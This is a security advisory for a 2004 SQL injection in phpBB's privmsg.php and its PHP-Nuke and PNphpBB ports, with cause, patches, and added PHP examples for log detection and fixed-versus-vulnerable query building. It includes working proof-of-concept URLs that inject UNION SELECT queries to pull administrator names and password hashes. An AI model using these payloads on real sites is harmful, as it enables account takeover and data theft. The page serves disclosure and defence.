PHPBB Privmsg.PHP SQL Injection Vulnerability
BID:9984
Info
| Bugtraq ID: | 9984 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2004 12:00AM |
| Updated: | Mar 26 2004 12:00AM |
| Credit: | Discovery of this issue is credited to Janek Vind <[email protected]> |
| Vulnerable: | PNphpBB: PNphpBB 1.2 g, 1.2 f, 1.2 |
| | phpBB Group: phpBB 2.0.8, 2.0.7 a, 2.0.7, 2.0.6 d, 2.0.6 c, 2.0.6, 2.0.5, 2.0.4, 2.0.3, 2.0.2, 2.0.1, 2.0.0, 2.0 RC4, 2.0 RC3, 2.0 RC2, 2.0 RC1, 2.0 Beta 1 |
| | Francisco Burzi: PHP-Nuke 7.1, 7.0 FINAL, 7.0, 6.9, 6.7, 6.6, 6.5 RC3, 6.5 RC2, 6.5 RC1, 6.5 FINAL, 6.5 BETA 1, 6.5, 6.0 |
| Not Vulnerable: | |
Discussion
The 'privmsg.php' script in phpBB (and in the PHP-Nuke and PNphpBB ports that bundle it) is prone to a remote SQL injection vulnerability. The script builds the WHERE clause of its private-message queries in a variable named $pm_sql_user, and in the 'savebox' folder branch it appends to that variable with '.=' without first initialising it. With PHP's register_globals enabled (the default on which phpBB 2 relied), a request parameter of the same name, pm_sql_user, arrives as an already-defined variable, so whatever the attacker puts in that parameter is prepended to the query unescaped. The folder, mode and p parameters only select the vulnerable code path; the injected SQL is carried entirely in pm_sql_user.
This allows a remote, unauthenticated attacker to alter the query logic, for example with a UNION SELECT against the users table to retrieve the administrator's password hash, or to read or corrupt other database contents. SQL injection may also be used to reach latent vulnerabilities in the underlying database server.
Exploit / POC
No separate exploit code is required; a single crafted URL triggers the issue. The following proof-of-concept URLs have been provided (in each, the injected SQL is the value of the pm_sql_user parameter and the trailing '/*' comments out the rest of the original query):
phpBB:
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/*
PHP-Nuke:
http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
The following proof of concept has been provided by JeiAr <[email protected]>:
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
Pnphpbb:
http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql here]
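Because privmsg.php never intentionally reads a request parameter named pm_sql_user, its presence in a web server log is a reliable indicator of an exploitation attempt against any of the three products above. The following is an added detection example written for this page, not code from the advisory, phpBB, PHP-Nuke or PNphpBB; the log lines are constructed for the demo in Apache combined format, and the client addresses and paths are invented.

```php
<?php
// Added detection example (not from the advisory or any of the affected projects):
// flag any request whose query string carries a pm_sql_user parameter, the
// injection point used by all three proof-of-concept URLs above.
declare(strict_types=1);

// Constructed Apache combined-format log lines for the demo (addresses/paths invented).
$log = <<<'LOG'
10.0.0.5 - - [26/Mar/2004:10:01:02 +0000] "GET /privmsg.php?folder=inbox&mode=read&p=17 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.9 - - [26/Mar/2004:10:01:07 +0000] "GET /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null/* HTTP/1.1" 200 4100 "-" "curl/7.10"
10.0.0.9 - - [26/Mar/2004:10:01:09 +0000] "GET /modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type%3D-99%20UNION%20SELECT%20aid,null,pwd%20FROM%20nuke_authors/* HTTP/1.1" 200 4100 "-" "curl/7.10"
10.0.0.7 - - [26/Mar/2004:10:02:00 +0000] "GET /index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=3 HTTP/1.1" 200 3900 "-" "Mozilla/4.0"
LOG;

/**
 * Scan combined-format log text and return one record per request that
 * carries a pm_sql_user parameter. The parameter name alone is the signal:
 * the script has no legitimate use for it, so there is nothing to whitelist.
 */
function scan_log(string $log): array
{
    $hits = [];
    foreach (explode("\n", $log) as $line) {
        // Pull the request target out of the quoted "METHOD target HTTP/x.y" field.
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $target = $m[1];
        $query  = (string) parse_url($target, PHP_URL_QUERY);
        // parse_str percent-decodes the values the same way PHP did for the
        // application, so %20 and %3D variants normalise to one form.
        parse_str($query, $params);
        if (!array_key_exists('pm_sql_user', $params)) {
            continue;
        }
        $injected = (string) $params['pm_sql_user'];
        $hits[] = [
            'client'   => explode(' ', $line)[0],
            'script'   => (string) parse_url($target, PHP_URL_PATH),
            'injected' => $injected,
            // The PoCs use UNION SELECT; record it, but alert on the parameter
            // regardless, since error-based or blind payloads look different.
            'union'    => stripos($injected, 'union') !== false,
        ];
    }
    return $hits;
}

foreach (scan_log($log) as $hit) {
    printf("%s %s pm_sql_user=%s%s\n",
        $hit['client'], $hit['script'], $hit['injected'],
        $hit['union'] ? '  [UNION SELECT]' : '');
}
```

Running this over the constructed lines reports the two requests from 10.0.0.9 and ignores the legitimate inbox and PNphpBB reads, which lack the parameter. Matching on the decoded parameter name rather than on the literal string "UNION" in the raw URL is deliberate: the encoded PoC forms differ between the three products, and an attacker can vary encoding and keywords freely, but cannot avoid naming the variable the script appends to.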
Solution / Fix
Solution:
The following untested and unverified workaround has been provided by JeiAr <[email protected]>. It initialises $pm_sql_user to an empty string before the first append, which discards any value injected through register_globals:
Replace this:
$pm_sql_user .= "<random_query_data>";
With this:
$pm_sql_user = '';
$pm_sql_user .= "<random_query_data>";
The following patch has been provided by Shaun Colley <[email protected]>. It should be noted that this patch has not been verified by Symantec:
http://www.nettwerked.co.uk/code/privmsg-sqlinj.patch
The vendor has posted a fix. The change is a single character in privmsg.php: the 'savebox' branch appended to $pm_sql_user with '.=' although nothing had initialised the variable, and it is changed to a plain assignment so that a request-supplied value can no longer be prepended:
FIND - Line 215:
$pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
REPLACE WITH:
$pm_sql_user = "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
It has also been reported that all available versions of the software have been updated with this fix; any version of the software previously vulnerable will no longer be when acquired from the vendor web site.
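To make the effect of that one-character change concrete, the following is an added example written for this page; it is not phpBB's privmsg.php. It reproduces the shape of the 'savebox' branch described above, emulates register_globals by assigning the request value to $pm_sql_user explicitly, and uses a shortened three-column placeholder query (phpBB's real read query selects more columns, which is why the PoC URLs pad the UNION with 31 nulls). The constant values, column names and sample user id are assumptions for the demo.

```php
<?php
// Added example (not phpBB code): the savebox branch of privmsg.php in its
// vulnerable ('.=') and fixed ('=') forms, with register_globals emulated.
declare(strict_types=1);

// Message-type constants as used by phpBB 2's savebox branch (values assumed here).
const PRIVMSGS_SAVED_IN_MAIL  = 3;
const PRIVMSGS_SAVED_OUT_MAIL = 4;

/**
 * Build the mode=read query for message $privmsgs_id in the savebox of $user_id.
 * $request_value emulates register_globals=On: it is whatever the client sent
 * as ?pm_sql_user=..., or '' when the request carried no such parameter.
 */
function read_query(int $user_id, int $privmsgs_id, string $request_value, bool $fixed): string
{
    // Under register_globals this variable already exists when the branch runs.
    $pm_sql_user = $request_value;

    $legit = "AND ( ( pm.privmsgs_to_userid = $user_id AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) "
           . "OR ( pm.privmsgs_from_userid = $user_id AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " ) )";

    if ($fixed) {
        $pm_sql_user = $legit;     // vendor fix: assignment overwrites the request value
    } else {
        $pm_sql_user .= $legit;    // vulnerable: append keeps the request value as a prefix
    }

    // Simplified shape of the read query; column list is a placeholder.
    return "SELECT pm.privmsgs_id, pm.privmsgs_subject, pmt.privmsgs_text "
         . "FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt "
         . "WHERE pm.privmsgs_id = $privmsgs_id AND pmt.privmsgs_text_id = pm.privmsgs_id "
         . $pm_sql_user;
}

/** True when the request value survived into the query text, i.e. the build is injectable. */
function is_injectable(string $sql, string $request_value): bool
{
    return $request_value !== '' && strpos($sql, $request_value) !== false;
}

// Decoded form of JeiAr's payload, trimmed to the three placeholder columns.
$attack = "AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password "
        . "FROM phpbb_users WHERE user_id=2 LIMIT 1/*";

$vuln  = read_query(42, 99, $attack, false);
$safe  = read_query(42, 99, $attack, true);

echo "vulnerable: ", $vuln, "\n\n";
echo "fixed:      ", $safe, "\n\n";
echo "injectable before fix: ", var_export(is_injectable($vuln, $attack), true), "\n";
echo "injectable after fix:  ", var_export(is_injectable($safe, $attack), true), "\n";
```

In the vulnerable output the attacker's text sits directly after the legitimate WHERE conditions: 'AND pm.privmsgs_type=-99' makes the original SELECT match nothing, the UNION supplies one row shaped like a private message (here a username and password hash from phpbb_users, the same idea as the PoC), and the trailing '/*' opens a comment that MySQL runs to the end of the statement, so the appended savebox clause never executes. The fixed build contains none of the request value. Both JeiAr's workaround and the vendor's change work for the same reason, which is that the first write to $pm_sql_user becomes an assignment; the underlying enabler is register_globals, and turning it off in php.ini is the complementary server-side hardening for any phpBB 2 installation that cannot be patched immediately.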
References
References:
- phpBB Homepage (phpBB)
- PHPNuke INP Homepage (PHPNuke INP)
- PNphpBB Homepage (PNphpBB)
- [waraxe-2004-SA#013] - Critical sql injection bug in PhpBB 2.0.8 (Janek Vind)
- Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor (JoCaNoR SeCuRiTy TeaM)
- Re: [waraxe-2004-SA#013] - Critical sql injection bug in PhpBB 2.0.8 (JeiAr)